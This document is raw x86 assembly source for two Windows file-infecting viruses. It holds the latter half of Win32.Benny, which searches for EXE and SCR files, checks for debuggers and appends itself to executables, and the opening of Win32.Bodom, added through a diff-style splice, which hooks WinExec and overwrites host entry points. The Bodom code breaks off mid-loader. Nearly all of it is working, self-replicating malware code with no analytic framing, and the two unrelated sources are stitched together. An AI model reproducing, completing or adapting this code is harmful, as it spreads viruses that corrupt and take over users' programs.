jmp eax ;jump to host
end_unpacking:
lea edx, [ebp + vszKernel32] ;KERNEL32
push edx
mov edx, [ebp + MyGetModuleHandleA] ;GetModuleHandleA API
call [edx] ;get module of kernel32
xchg eax, ecx
jecxz quit ;shit, not found, jump to host
xchg ecx, ebx
lea edi, [ebp + Virus_End] ;get addresses of APIs
lea esi, [ebp + f_names]
GetAPIAddress:
call MyGetProcAddress
jecxz quit
xchg eax, ecx
stosd
@endsz
cmp byte ptr [esi], 0
jne GetAPIAddress
pushad ;now, we have all APIs, we can check
@SEH_SetupFrame ;for debugger
inc dword ptr gs:[edx] ;raise exception
;now, we continue at seh_fn label
seh_rs: lea esi, [ebp + PathName] ;debugger not present, continue
push esi
push esi
push 256
call [ebp + MyGetCurrentDirectoryA] ;get current directory
pop ebx
push 256
lea edi, [ebp + WindowsPath]
push edi
call [ebp + MyGetWindowsDirectoryA] ;get windows directory
Next_Char:
cmpsb ;compare directories
jmp_patch:
jne NoMatch ;this jump will be path in next check
jne Try_Process_Dir ;jump for next check fail
Matched_Char:
cmp byte ptr [esi - 1], 0 ;end of string ?
jne Next_Char
jmp quit
NoMatch: ;check for system directory
push 256
lea edi, [ebp + WindowsPath]
push edi
call [ebp + MyGetSystemDirectoryA]
mov word ptr [ebp + jmp_patch], 9090h ;patch jump
mov esi, ebx
jmp Next_Char
Try_Process_Dir:
call FindFirstFile ;we arnt in \windoze or \system dir, find file
inc eax ;success ?
je Try_Scr ;nope, try SCRs
dec eax
process_dir_check:
call CheckFileName ;check name
jnc Infect_File ;ok, infect file
call FindNextFile ;nope, find next file
test eax, eax
jne process_dir_check ;ok, check name
Try_Scr:
call FindClose ;find previous searchin
lea edx, [ebp + Win32_Find_Data]
push edx
lea edx, [ebp + vszScr]
push edx
call [ebp + MyFindFirstFileA] ;find first SCR
inc eax
je quit ;no files left, jump to host
dec eax
Infect_File:
;Check size
xor ecx, ecx
lea ebx, [ebp + Win32_Find_Data]
test byte ptr [ebx], FILE_ATTRIBUTE_DIRECTORY
jne end_size_check ;discard directories
cmp [ebx.WFD_nFileSizeHigh], ecx ;discard huge files
jne end_size_check
mov edi, [ebx.WFD_nFileSizeLow]
lea esi, [ebx.WFD_szFileName]
cmp edi, 16 * 1024 ;discard small files
jb end_size_check
cmp edi, 64000 * 1024
jg end_size_check ;discard huge files
push ecx ;blank file attributez
push esi
call [ebp + MySetFileAttributesA]
test eax, eax
je end_size_check
push edi ;open and map file
sub edi, Start_Virus - Virtual_End
call Open&MapFile
pop edi
test ecx, ecx
je end_SetFileAttributez
cmp word ptr [ecx], 'ZM' ;Check PE-header
jne Close&UnmapFile
xchg eax, edx
mov edx, [ecx.MZ_lfanew]
cmp eax, edx
jb CloseFile
add edx, ecx
cmp dword ptr [edx], 'EP'
jne CloseFile
movzx eax, word ptr [edx.NT_FileHeader.FH_Machine]
cmp ax, 14ch ;must be 386+
jne CloseFile
mov ebx, ecx
movzx ecx, word ptr [edx.NT_FileHeader.FH_NumberOfSections]
cmp ecx, 3
jb CloseFile ;at least 3 sections
mov ax, word ptr [edx.NT_FileHeader.FH_Characteristics]
not al
test ax, 2002h ;executable, but not DLL
jne CloseFile
cmp dword ptr [edx.NT_OptionalHeader.OH_ImageBase], 64*65536 ;image base only 400000h
jne CloseFile
lea eax, [ebp + vszGetModuleHandleA]
mov ecx, ebx
lea edx, [ebp + vszKernel32]
call GetProcAddressIT ;find GetModuleHandleA API entry
test eax, eax
je CloseFile
lea edx, [ebp + MyGetModuleHandleA]
sub eax, -400000h
mov [edx], eax ;save that entry
pushad ;load 64bit checksum
push ebx
mov esi, ebx
sub esi, -MZ_res2
lodsd
mov ebx, eax
lodsd
mov edi, eax
pop esi
push esi
push ebp
mov eax, [ebp + Win32_Find_Data.WFD_nFileSizeLow]
sub esi, -MZ_res2 - 8
mov ebp, 8
cdq
div ebp
cdq
mul ebp
pop ebp
mov ecx, eax
call Checksum64 ;generate new 64bit checksum
pop esi ;and compare checksums
cmp ebx, edx
jne n_Infect
cmp edi, eax
je CloseFile
n_Infect:
popad
push ecx
push ecx
mov edx, [ecx.MZ_lfanew]
add edx, ecx
movzx esi, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader]
lea esi, [edx.NT_OptionalHeader + esi] ;locate first section
movzx ecx, word ptr [edx.NT_FileHeader.FH_NumberOfSections] ;get number of sctnz
mov edi, esi ;get LAST section
xor eax, eax
push ecx
BSection:
cmp [edi.SH_PointerToRawData], eax
je NBiggest
mov ebx, ecx
mov eax, [edi.SH_PointerToRawData]
NBiggest:
sub edi, -IMAGE_SIZEOF_SECTION_HEADER
loop BSection
pop ecx
sub ecx, ebx
push edx
imul eax, ecx, IMAGE_SIZEOF_SECTION_HEADER
pop edx
add esi, eax
mov edi, dword ptr [esi.SH_SizeOfRawData]
mov eax, Virtual_End - Start_Virus
push edi
lea edi, [esi.SH_VirtualSize] ;new virtual size of section
push dword ptr [edi]
add [edi], eax
mov eax, [edi]
push edx
mov ecx, [edx.NT_OptionalHeader.OH_FileAlignment]
xor edx, edx
div ecx
xor edx, edx
inc eax
mul ecx
mov [esi.SH_SizeOfRawData], eax ;new SizeOfRawData (aligned virtual size)
mov ecx, eax
pop edx
pop ebx
add ebx, [esi.SH_VirtualAddress]
mov eax, [edx.NT_OptionalHeader.OH_AddressOfEntryPoint]
pop edi
push eax
mov eax, [ebp + OrigEPoint]
pop [ebp + OrigEPoint]
mov [edx.NT_OptionalHeader.OH_AddressOfEntryPoint], ebx
sub ecx, edi
add [edx.NT_OptionalHeader.OH_SizeOfImage], ecx ;new SizeOfImage
or byte ptr [esi.SH_Characteristics.hiw.hib], 0e0h ;change flags
pop edi
add edi, [esi.SH_PointerToRawData]
add edi, [esi.SH_VirtualSize]
add edi, Start_Virus - Virtual_End
lea esi, [ebp + Start_Virus]
mov ecx, (Virus_End - Start_Virus + 3) / 4
rep movsd ;copy virus
mov [ebp + OrigEPoint], eax ;restore variable after copy stage
jmp CloseFileOK
CloseFile:
call Close&UnmapFile ;unmap view of file
jmp end_SetFileAttributez ;and restore attributes
CloseFileOK:
pop esi
push esi
push ebx
push ebp
mov ebp, 8
mov ebx, MZ_res2 + 8
add esi, ebx
mov ecx, ebp
mov eax, edi
add eax, ebx
sub eax, esi
cdq
div ecx
cdq
imul ecx, eax, 8
call Checksum64 ;generate new 64bit checksum as "already infected" mark
sub esi, ebp
mov [esi], edx ;store it to MZ.MZ_res2 field
mov [esi+4], eax
pop ebp
pop ebx
pop esi
sub edi, esi
mov [ebp + Win32_Find_Data.WFD_nFileSizeLow], edi ;correct file size for unmapping
call Close&UnmapFile ;unmap view of file
end_SetFileAttributez:
push dword ptr [ebp + Win32_Find_Data] ;restore attributes
push esi
call [ebp + MySetFileAttributesA]
end_size_check:
call FindNextFile ;find next file
test eax, eax
jne next_file ;weve got one, check that
call FindClose ;nope, close search handle
jmp quit ;and jump to host
next_file:
call CheckFileName ;check file name
jnc Infect_File ;ok, infect it
jmp end_size_check ;nope, try next file
CheckFileName proc ;check file name
lea edi, [ebp + Win32_Find_Data.WFD_szFileName]
lea esi, [ebp + vszNamez]
mov ecx, vszNumberOfNamez
mov edx, edi
Ext_Next_Char:
@endsz
mov edi, edx
Ext_Next_Char2:
cmpsb
je Ext_Matched_Char
inc eax
loop Ext_Next_Char
clc
ret
Ext_Matched_Char:
cmp byte ptr [esi - 1], 0
jne Ext_Next_Char2
stc
end_Ext_Checking:
ret
CheckFileName EndP
FindFirstFile proc ;find first file procedure
lea edx, [ebp + Win32_Find_Data]
push edx
lea edx, [ebp + vszExe]
push edx
call [ebp + MyFindFirstFileA]
mov [ebp + SearchHandle], eax
ret
FindFirstFile EndP
FindNextFile proc ;find next file procedure
lea edx, [ebp + Win32_Find_Data]
push edx
push dword ptr [ebp + SearchHandle]
call [ebp + MyFindNextFileA]
ret
FindNextFile EndP
FindClose proc ;find close procedure
push dword ptr [ebp + SearchHandle]
call [ebp + MyFindClose]
ret
FindClose EndP
Open&MapFile proc ;open and map file procedure
xor eax, eax
push eax ;NULL
push eax ;FILE_ATTRIBUTE_NORMAL
push 3 ;OPEN_EXISTING
push eax ;NULL
push 1 ;FILE_SHARE_READ
push 0c0000000h ;GENERIC_READ | GENERIC_WRITE
push esi ;pszFileName
call [ebp + MyCreateFileA] ;open
cdq
inc eax
je end_Open&MapFile
dec eax
mov [ebp + hFile], eax
push edx ;NULL
push edi ;file size
push edx ;0
push 4 ;PAGE_READWRITE
push edx ;NULL
push eax ;handle
call [ebp + MyCreateFileMappingA] ;create mapping object
cdq
xchg ecx, eax
jecxz end_Open&MapFile2
mov [ebp + hMapFile], ecx
push edx ;0
push edx ;0
push edx ;0
push 2 ;FILE_MAP_WRITE
push ecx ;handle
call [ebp + MyMapViewOfFile] ;map file to address space of app
mov ecx, eax
jecxz end_Open&MapFile3
mov [ebp + lpFile], ecx
end_Open&MapFile:
mov ecx, eax
ret
Open&MapFile EndP
Close&UnmapFile proc ;close and unmap file procedure
push dword ptr [ebp + lpFile]
call [ebp + MyUnmapViewOfFile] ;unmap file
end_Open&MapFile3:
push dword ptr [ebp + hMapFile]
call [ebp + MyCloseHandle] ;close mapping object
end_Open&MapFile2:
mov ebx, [ebp + hFile]
cdq ;xor edx, edx
push edx ;FILE_BEGIN
push edx ;0 - high offset
push dword ptr [ebp + Win32_Find_Data.WFD_nFileSizeLow]
push ebx
call [ebp + MySetFilePointer]
push ebx
call [ebp + MySetEndOfFile] ;truncate file
lea edx, [ebp + Win32_Find_Data.WFD_ftLastWriteTime]
push edx
lea edx, [ebp + Win32_Find_Data.WFD_ftLastAccessTime]
push edx
lea edx, [ebp + Win32_Find_Data.WFD_ftCreationTime]
push edx
push ebx
call [ebp + MySetFileTime] ;restore time
push ebx
call [ebp + MyCloseHandle] ;and finally close file
ret
Close&UnmapFile EndP
;procedure for exploring modules export table
MyGetProcAddress proc ;input:
;ebx - module address
;esi - pointer to API name
;output:
;ecx - address of GetProcAddress at memory
push ebx
push edi
push esi
push ebp
@SEH_SetupFrame
mov eax, ebx
add eax, [eax.MZ_lfanew]
mov ecx, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size]
jecxz Proc_Address_not_found
mov ebp, ebx
add ebp, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
push ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfNames]
mov ecx, [ebp.ED_NumberOfNames]
xor eax, eax
Search_for_API_name:
mov edi, [esp + 16]
mov esi, ebx
add esi, [edx + eax * 4]
Next_Char_in_API_name:
cmpsb
jz Matched_char_in_API_name
inc eax
loop Search_for_API_name
pop eax
Proc_Address_not_found:
xor eax, eax
jmp End_MyGetProcAddress
Matched_char_in_API_name:
cmp byte ptr [esi-1], 0
jne Next_Char_in_API_name
pop ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfOrdinals]
movzx eax, word ptr [edx + eax * 2]
Check_Index:
cmp eax, [ebp.ED_NumberOfFunctions]
jae Proc_Address_not_found
mov edx, ebx
add edx, [ebp.ED_AddressOfFunctions]
add ebx, [edx + eax * 4]
mov eax, ebx
sub ebx, ebp
cmp ebx, ecx
jb Proc_Address_not_found
End_MyGetProcAddress:
@SEH_RemoveFrame
xchg eax, ecx
pop ebp
pop esi
pop edi
pop ebx
ret
MyGetProcAddress endp
;all beginners=> im so sorry, but I didnt have any time to comment this stuff.
GetProcAddressIT proc ;input:
;EAX - API name
;ECX - lptr to PE header
;EDX - module name
;output:
;EAX - RVA pointer to IAT, 0 if error
pushad
xor eax, eax
push ebp
mov ebp, ecx
lea esi, [ecx.MZ_lfanew]
add ebp, [esi]
mov esi, ebp
;RVA of Import table
mov eax, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress]
mov ebp, ecx
push ecx
movzx ecx, word ptr [esi.NT_FileHeader.FH_NumberOfSections]
movzx ebx, word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea ebx, [esi.NT_OptionalHeader + ebx]
scan_sections:
mov edx, [ebx.SH_VirtualAddress]
cmp edx, eax
je section_found
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER
loop scan_sections
pop ecx
pop eax
jmp End_GetProcAddressIT2
section_found:
mov ebx, [ebx + 20]
add ebx, ebp
pop ecx
pop eax
test ebx, ebx
je End_GetProcAddressIT2
xor esi, esi
xor ebp, ebp
push esi
dec ebp
Get_DLL_Name:
pop esi
inc ebp
mov edi, [esp + 20]
mov ecx, [ebx.esi.ID_Name] ;Name RVA
test ecx, ecx
je End_GetProcAddressIT2
sub ecx, edx
sub esi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
push esi
lea esi, [ebx + ecx]
Next_Char_from_DLL:
lodsb
add al, -'.'
jz IT_nup
sub al, -'.' + 'a'
cmp al, 'z' - 'a' + 1
jae no_up
add al, -20h
no_up: sub al, -'a'
IT_nup: scasb
jne Get_DLL_Name
cmp byte ptr [edi-1], 0
jne Next_Char_from_DLL
Found_DLL_Name:
pop esi
imul eax, ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
mov ecx, [ebx + eax.ID_OriginalFirstThunk]
jecxz End_GetProcAddressIT2
sub ecx, edx
add ecx, ebx
xor esi, esi
Next_Imported_Name:
push esi
mov edi, [esp + 32]
mov esi, [ecx + esi]
test esi, esi
je End_GetProcAddressIT3
sub esi, edx
add esi, ebx
lodsw
next_char:
cmpsb
jne next_step
cmp byte ptr [esi-1], 0
je got_it
jmp next_char
next_step:
pop esi
sub esi, -4
jmp Next_Imported_Name
got_it: pop esi
imul ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
add ebx, ebp
mov eax, [ebx.ID_FirstThunk]
add eax, esi
mov [esp + 28], eax
jmp End_GetProcAddressIT
End_GetProcAddressIT3:
pop eax
End_GetProcAddressIT2:
xor eax, eax
mov [esp.Pushad_eax], eax
End_GetProcAddressIT:
popad
ret
GetProcAddressIT EndP
Checksum64 proc ;output:
; EDX:EAX - 64-bit checksum
push ebx ;save regs
push ecx
push edi
push esi
xor eax, eax ;nulify eax
cdq ;nulify edx
make_crc:
call crc_byte ;read 8 bytes
adc eax, ebx ;add LSD + CF to LSD
jnc @1
not eax ;invert LSD
@1: xor eax, edx ;rotate LSD LSB times
jp @2
call crc_rotate ;rotate LSD and MSD
@2: js crc_msd
sbb eax, edx ;sub LSD with MSD + CF
crc_msd:sbb edx, edi ;sub MSD with MSD + CF
jnp @3
not edx ;invert MSD
@3: xor edx, eax ;xor MSD with LSD
jns @4
call crc_rotate ;rotate LSD and MSD
@4: jc crc_loop
adc edx, eax ;add LSD to MSD + CF
crc_loop:
jp next_loop
call crc_swap ;swap bytes in LSD and MSD
next_loop:
dec eax ;decrement LSD
inc edx ;increment MSD
loop make_crc ;until ecx = 1
pop esi ;restore regs
pop edi
pop ecx
pop ebx
ret
crc_byte: ;read 8 bytes from source
push eax
lodsd ;load 4 bytes
mov ebx, eax ;ebx = new 4 bytes
lodsd ;load next 4 bytes
mov edi, eax ;edi = new 4 bytes
pop eax
add ecx, -7 ;correct ecx for loop
ret
crc_rotate: ;rotate LSD and MSD
push ecx
push edi
xor edi, eax ;xor MSD with LSD
mov ecx, edi ;count of rotations
pop edi
rcr eax, cl ;rotate LSD
push ebx
xor ebx, edx ;xor LSD with MSD
mov ecx, ebx ;count of rotations
pop ebx
rcl edx, cl ;rotate MSD
pop ecx
ret
crc_swap: ;swap bytes in LSD and MSD
xchg al, dh ;swap LSD and MSD lower bytes
xchg ah, dl ; ...
rol eax, 16 ;get highest bytes
rol edx, 16 ; ...
xchg al, dh ;swap LSD and MSD higher bytes
xchg ah, dl ; ...
xchg eax, edx ;and swap LSD with MSD
ret
db 'Win32.Benny (c) 1999 by Benny', 0 ;my mark
Checksum64 EndP
OrigEPoint dd offset host - 400000h
MyGetModuleHandleA dd offset _GetModuleHandleA
Virus_End:
MyGetVersion dd ?
MyIsDebuggerPresent dd ?
MyCreateFileA dd ?
MyFindFirstFileA dd ?
MyFindNextFileA dd ?
MyFindClose dd ?
MySetFileAttributesA dd ?
MyCloseHandle dd ?
MyCreateFileMappingA dd ?
MyMapViewOfFile dd ?
MyUnmapViewOfFile dd ?
MySetFilePointer dd ?
MySetEndOfFile dd ?
MySetFileTime dd ?
MyGetWindowsDirectoryA dd ?
MyGetSystemDirectoryA dd ?
MyGetCurrentDirectoryA dd ?
v_strings:
vszKernel32 db 'KERNEL32', 0
vszGetModuleHandleA db 'GetModuleHandleA', 0
f_names:
vszGetVersion db 'GetVersion', 0
vszIsDebuggerPresent db 'IsDebuggerPresent', 0
vszCreateFileA db 'CreateFileA', 0
vszFindFirstFileA db 'FindFirstFileA', 0
vszFindNextFileA db 'FindNextFileA', 0
vszFindClose db 'FindClose', 0
vszSetFileAttributesA db 'SetFileAttributesA', 0
vszCloseHandle db 'CloseHandle', 0
vszCreateFileMappingA db 'CreateFileMappingA', 0
vszMapViewOfFile db 'MapViewOfFile', 0
vszUnmapViewOfFile db 'UnmapViewOfFile', 0
vszSetFilePointer db 'SetFilePointer', 0
vszSetEndOfFile db 'SetEndOfFile', 0
vszSetFileTime db 'SetFileTime', 0
vszGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0
vszGetSystemDirectoryA db 'GetSystemDirectoryA', 0
vszGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0, 0
vszExe db '*.EXE', 0
vszScr db '*.SCR', 0
vszNamez db 'NTVDM.EXE', 0
db 'RUNDLL32.EXE', 0
db 'TD32.EXE', 0
db 'TLINK32.EXE', 0
db 'TASM32.EXE', 0
PathName db 256 dup (?)
WindowsPath db 256 dup (?)
Win32_Find_Data WIN32_FIND_DATA ?
SearchHandle dd ?
hFile dd ?
hMapFile dd ?
lpFile dd ?
Virtual_End:
_GetModuleHandleA dd offset GetModuleHandleA
host: push 1000h
push offset Msg
push offset Msg
push 0
call MessageBoxA
exit_h: push 0
call ExitProcess
Msg db 'First generation of Win32.Benny', 0
ends
End Start_Virus
+561
@@ -0,0 +1,561 @@
; Win32.Bodom by DR-EF (c) 2004
; -----------------------------
;Author:DR-EF
;Type:Per Process Resident/Direct Action PE infector
;Size:about 1700 bytes
;Features:
;---------
; 1)virus body is placed between the end of
; headers and the first section body,so
; it dont increase file size
; 2)E.P.O - virus dont modifly entry point
; instead it overwrite the host entry
; point with code that jump to loader
; 3)dont change section flags,instead it
; place loader at the aligned space of the
; code section,this loader allocate memory
; and copy the virus body to there,and run
; it from the allocated memory
; 4)Per Process residenty - the virus hook the
; WinExec api,and infect files when this api
; is called,it infect the currect directory
; as well
;
;
; DR-EF.
extrn ExitProcess:proc
.586
.model flat
DEBUG equ 0
VirusSize equ (VirusEnd-VirusStart)
.data
db ?
.code
_main:
;first generation init code:
mov eax,VirusSize
mov ebx,SizeOfLoaderCode
xor ebp,ebp
mov dword ptr [ebp + HostEntryPoint_of],offset Exit
mov edi,offset HostEntryPointBytes
mov esi,offset Exit
mov ecx,SizeOfJumpCode
rep movsb
VirusStart equ $
call Delta
Delta: pop ebp
sub ebp,offset Delta
mov eax,dword ptr [esp]
xor ax,ax
mov ebx,eax
@NextP: cmp word ptr [eax],"ZM" ;check mz sign
jne MoveNP
mov ebx,eax
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
je kernelF
MoveNP: xchg eax,ebx
sub eax,1000h
jmp @NextP ;move to next page
kernelF:xchg eax,ebx
push eax
SearchGetProcAddress:
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[esp]
push eax ;eax - kernel32 export table
xor edx,edx
mov eax,[eax + 20h]
add eax,[esp + 4h]
mov edi,[eax]
add edi,[esp + 4h] ;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax ;eax - kernel32 export table
shl edx,1h ;edx - GetProcAddress position
mov ebx,[eax + 24h]
add ebx,[esp]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[esp]
add ebx,edx
mov ebx,[ebx]
add ebx,[esp]
mov [ebp + __GetProcAddress],ebx
mov ecx,NumberOfApis ;ecx - number of apis
lea eax,[ebp + ApiNamesTable] ;eax - address to api strings
lea ebx,[ebp + ApiAddressTable] ;ebx - address to api address
pop edx ;edx - module handle
NextAPI:push ecx
push edx
push eax
push eax
push edx
call [ebp + __GetProcAddress]
mov dword ptr [ebx],eax
pop eax
NextSTR:inc eax
cmp byte ptr [eax],0h
jne NextSTR
inc eax
add ebx,4h
pop edx
pop ecx
loop NextAPI
lea eax,[ebp + WIN32_FIND_DATA]
push eax
call _FindF
db "*.exe",0
_FindF: call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je Hook
mov [ebp + hfind],eax
@Find: lea ebx,[ebp + cFileName]
call InfectFile
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
or eax,eax
jnz @Find
Hook: ;hook the WinExec api
mov eax,400000h ;host image base
HostImageBase equ ($-VirusStart-4)
lea ebx,[ebp + dll]
lea ecx,[ebp + fn]
lea edx,[ebp + WinExecHook]
call HookApi
mov [ebp + WinExec_],eax
ReturnToHost:
mov edi,12345678h
HostEntryPoint_of equ ($-4)
HostEntryPoint_ equ ($-VirusStart-4)
push edi
call dummy
HostEntryPoint dd 0
dummy: push PAGE_EXECUTE_READWRITE
push 1000h
push edi
call [ebp + VirtualProtect]
mov ecx,SizeOfJumpCode
lea esi,[ebp + HostEntryPointBytes]
rep movsb
ret
db "[Win32.Bodom] Written By DR-EF (c) 2004"
;input:
;eax - image base
;ebx - dll name
;ecx - function name
;edx - hook procedure
;output
;eax - new function address or 0 if fail
HookApi:
cmp word ptr [eax],"ZM" ;check mz sign
jne HookErr
push eax ;save image base in the stack
add eax,[eax + 3ch] ;goto pe header
add eax,80h
mov eax,[eax] ;get import section rva
cmp eax,0h
je HookErr_
add eax,[esp] ;convert it to va
@Dll: mov esi,[eax + 0ch]
cmp esi,0h
je HookErr_
add esi,[esp] ;esi - dll name
;compare the dll name in [esi],with our dll:
pushad
xchg edi,ebx
xor ecx,ecx
@Gsize: cmp byte ptr [edi+ecx],0h ;get our dll size
je _Size
inc ecx
jmp @Gsize
_Size: rep cmpsb
je _dll
popad
add eax,14h ;move to next IMAGE_IMPORT_DESCRIPTOR structure
jmp @Dll
_dll: popad
;edx - Hook procedure
;ecx - function to hook
;eax - IMAGE_IMPORT_DESCRIPTOR of our api dll
;[esp] - image base
mov ebx,[eax] ;get rva to pointers to image import by name structures
add ebx,[esp] ;convert it to va
xor edi,edi ;used to save loop index
@FindApi:
;ebx - pointer to pointers arrary of import by name structures
push edi ;save loop index
push ebx ;save pointer to import by name structures
push eax ;save import section rva
push ecx ;save function to hook name
push edx ;save hook procedure
;--------------------------------------------------------------------
mov esi,[ebx] ;get import by name structure rva
add esi,[esp + 14h] ;convert it to va
add esi,2h ;skip the IBN_Hint
;compare api string with our api name:
mov edi,ecx ;move our api name into edi
xor ecx,ecx ;used to save our api name size
@GSize_:cmp byte ptr [edi + ecx],0h ;did we in the end ?
je ___Size
inc ecx
jmp @GSize_
___Size:inc ecx ;include the 0
rep cmpsb ;compare api names
je ApiFound ;we found it !
;--------------------------------------------------------------------
;restore everthing
pop edx
pop ecx
pop eax
pop ebx
pop edi
add edi,4h
add ebx,4h ;move to next pointer
cmp dword ptr [ebx],0h ;no more pointers ???
jne @FindApi
HookErr_:
pop eax
HookErr:xor eax,eax
ret
ApiFound:
pop edx
pop ecx
pop eax
pop ebx
pop edi
mov esi,[eax + 10h] ;rva to name
add esi,[esp]
add esi,edi ;goto our api address
mov eax,[esi] ;get our api old address
mov [esi],edx ;hook it !
pop esi ;restore stack
ret
WinExecHook:
IF DEBUG
int 3
ENDIF
pushad
pushfd
call HookD
HookD: pop ebp
sub ebp,offset HookD
mov ebx,[esp + 28h]
call InfectFile
popfd
popad
push ebp
call Hook_D
Hook_D: pop ebp
sub ebp,offset Hook_D
xchg eax,ebp
pop ebp
jmp dword ptr [eax + WinExec_]
WinExec_ dd 0
dll db "KERNEL32.dll",0
fn db "WinExec",0
hfind dd 0
INVALID_HANDLE_VALUE equ -1
WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0
ftLastAccessTime dq 0
ftLastWriteTime dq 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 0ffh dup (0)
cAlternateFileName db 14h dup (0)
;ebx - file name
InfectFile:
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push ebx
call [ebp + CreateFile]
inc eax
je ExitInfect
dec eax
mov dword ptr [ebp + hfile],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hfile]
call [ebp + CreateFileMapping]
or eax,eax
je ExitCloseFile
mov dword ptr [ebp + hmap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hmap]
call [ebp + MapViewOfFile]
or eax,eax
je ExitCloseMap
mov dword ptr [ebp + mapbase],eax
cmp word ptr [eax],"ZM" ;check mz sign
jne ExitUnmap
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
jne ExitUnmap
cmp byte ptr [eax + 0bh],29h ;check if already infected
je ExitUnmap
push eax ;save pe header offset in the stack
xor ecx,ecx
mov cx,[eax + 6h] ;get number of sections
mov ebx,[eax + 34h] ;get image base
mov dword ptr [ebp + VirusEntryPoint],ebx
mov dword ptr [ebp + LoaderEntryPoint],ebx
mov dword ptr [ebp + HostEntryPoint],ebx
mov ebx,[eax + 28h]
add dword ptr [ebp + HostEntryPoint],ebx
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h ;eax -first section header
mov ebx,[eax + 0ch] ;get virtual address
cmp ebx,[eax + 14h]
jne Exit__ ;dont infect file
push eax
@GetLS: add eax,28h
loop @GetLS
sub eax,[ebp + mapbase] ;get end of headers(pe & sections),in file
pop ebx
mov ecx,[ebx + 14h] ;get pointer to raw data of the first section
sub ecx,eax
cmp ecx,VirusSize ;there enough space ?
jb Exit__
mov edi,eax
add edi,[ebp + mapbase]
push edi
push edi
sub edi,[ebp + mapbase]
add dword ptr [ebp + VirusEntryPoint],edi ;save virus entry point
mov edx,[esp] ;get pe header offset
mov eax,[ebx + 10h] ;get size of raw data
sub eax,[ebx + 8h] ;get aligned space size
cmp eax,SizeOfLoaderCode
jb Exit__
mov edi,[ebx + 14h] ;get pointer to raw data
add edi,[ebx + 8h] ;goto alinged space
add dword ptr [ebp + LoaderEntryPoint],edi
add edi,[ebp + mapbase]
lea esi,[ebp + Loader_Code]
mov ecx,SizeOfLoaderCode
rep movsb ;copy the loader into the host
lea edi,[ebp + JumpCode]
xor ecx,ecx
mov cx,word ptr [ebp + push_and_ret+4]
mov byte ptr [edi],68h
mov dword ptr [edi + 1h],ecx
add edi,5h
mov ecx,dword ptr [ebp + push_and_ret]
mov byte ptr [edi],68h
mov dword ptr [edi +1h],ecx
pop edi
push edi
lea esi,[ebp + VirusStart]
mov ecx,VirusSize
rep movsb ;copy the virus into host
;patch the return to host address
pop edi
push dword ptr [ebp + HostEntryPoint]
pop dword ptr [edi + HostEntryPoint_]
mov esi,dword ptr [esp + 4h] ;get pe header
push dword ptr [esi + 34h] ;push image base
pop dword ptr [edi + HostImageBase] ;save image base in the virus body
mov esi,dword ptr [esi + 28h] ;get entry point
add esi,[ebp + mapbase]
pop edi
push esi
add edi,(HostEntryPointBytes - VirusStart)
mov ecx,SizeOfJumpCode
rep movsb ;save host entry point bytes
pop edi
lea esi,[ebp + JumpCode]
mov ecx,SizeOfJumpCode
rep movsb ;overwrite host entry point with jumper code
Exit__: pop eax ;restore pe header
mov byte ptr [eax + 0bh],29h ;sign the file as infected
ExitUnmap:
push dword ptr [ebp + mapbase]
call [ebp + UnmapViewOfFile]
ExitCloseMap:
push dword ptr [ebp + hmap]
call [ebp + CloseHandle]
ExitCloseFile:
push dword ptr [ebp + hfile]
call [ebp + CloseHandle]
ExitInfect:
ret
hfile dd 0
hmap dd 0
mapbase dd 0
push_and_ret:
db 68h
LoaderEntryPoint dd 0
db 0c3h
JumpCode:
db 0ah dup (0)
push esp
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
mov dword ptr [eax],eax
SizeOfJumpCode equ ($-JumpCode)
HostEntryPointBytes db SizeOfJumpCode dup(0)
PAGE_EXECUTE_READWRITE equ 40h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
OPEN_EXISTING equ 3
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
Loader_Code:
;find VirtualAlloc api,allocate memory,copy virus into memory & run it
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,0ch
mov eax,dword ptr [esp] ;get return address
xor ax,ax
@Find_: cmp word ptr [eax],"ZM"
je ___1
sub eax,1000h
jmp @Find_
___1: push eax ;eax - kernel base address
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[esp]
push eax ;eax - kernel32 export table
xor edx,edx
mov eax,[eax + 20h]
add eax,[esp+4h]
mov edi,[eax]
add edi,[esp+4h] ;edi - api names array
dec edi
NxtCmp: inc edi
call OverVA
db "VirtualAlloc",0
